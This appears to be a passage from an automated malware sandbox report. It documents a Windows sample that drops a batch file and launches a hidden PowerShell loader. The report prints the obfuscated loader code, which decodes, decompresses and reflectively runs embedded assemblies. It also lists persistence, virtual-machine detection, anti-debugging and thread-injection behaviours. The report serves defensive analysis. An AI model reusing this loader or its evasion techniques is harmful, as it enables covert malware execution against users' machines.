Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
                    Source: XgKnAQpuPM.exeStatic PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF776D11D10
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF776D115F4
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    .NET source code contains a sample name check
                    Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs.Net Code: _F6A9_24CA_2622_EF60_FFFD contains sample name check
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3208Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6690Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep count: 3208 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep count: 6690 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF776D12034
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D16710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF776D16710
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: VMware
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF776D11D10
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D18A1E SetUnhandledExceptionFilter,0_2_00007FF776D18A1E
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D18714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF776D18714

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5840Jump to behavior
                    Sets debug register (to hijack the execution of another thread)
